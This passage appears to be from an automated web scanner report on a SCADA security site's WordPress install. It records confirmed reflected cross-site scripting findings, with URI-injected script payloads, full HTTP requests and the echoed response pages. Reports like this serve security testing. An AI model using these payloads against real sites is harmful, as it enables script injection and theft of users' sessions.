Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that disables or impairs ..
- /wp-admin/css/login.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000406)%3C/script%3E

/wp-admin/css/login.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000406)%3C/script%3E CONFIRMED

https://www.digitalbond.com/wp-admin/css/login.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter | Type | Value
ver | GET | 20110121
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000406)</script>

Request

GET /wp-admin/css/login.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000406)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:35 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11394


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-admin Css Login Css'&quot;--&gt;&lt; Style&gt;&lt; Script&gt;&lt;script&gt;netsparker(0x000406)&lt; Script&gt;</title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond&#039;s SCADA Security Portal' 
href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>

<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>

<!-- Header -->
<td id="header" colspan="2">

<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond&#039;s SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1">&nbsp;</div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond&#039;s SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1">&nbsp;</div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" 
class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">

<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>


</td>
<!-- / Main Column -->

<!-- Right Inner Sidebar -->

<!-- Right Sidebar -->
<td id="right">

<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>:&nbsp;&nbsp;<a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-admin/css/login.css\'\"--></style></script><script>netsparker(0x000406)</script>/?_login=224a45f4e0"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>

<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-admin/css/login.css\'\"--></style></script><script>netsparker(0x000406)</script>/?_login=7df5623adb" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login &raquo;" />

<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>


</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS 
Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organize..
- /wp-content/themes/atahualpa/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000467)%3C/script%3E

/wp-content/themes/atahualpa/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000467)%3C/script%3E CONFIRMED

https://www.digitalbond.com/wp-content/themes/atahualpa/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000467)</script>

Request

GET /wp-content/themes/atahualpa/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000467)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:35 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-content Themes Atahualpa '&quot;--&gt;&lt; Style&gt;&lt; Script&gt;&lt;script&gt;netsparker(0x000467)&lt; Script&gt;</title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond&#039;s SCADA Security Portal' 
href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>

<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>

<!-- Header -->
<td id="header" colspan="2">

<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond&#039;s SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1">&nbsp;</div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond&#039;s SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=8" title="Industrial Defender"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/BWS6XY_banner_2011.02.22b.gif" alt="Industrial Defender" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1">&nbsp;</div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" 
class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">

<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>


</td>
<!-- / Main Column -->

<!-- Right Inner Sidebar -->

<!-- Right Sidebar -->
<td id="right">

<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>:&nbsp;&nbsp;<a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-content/themes/atahualpa/\'\"--></style></script><script>netsparker(0x000467)</script>/?_login=4a81e58a73"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>

<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-content/themes/atahualpa/\'\"--></style></script><script>netsparker(0x000467)</script>/?_login=046736026e" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login &raquo;" />

<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>


</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS 
Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of &quot;Executive Level 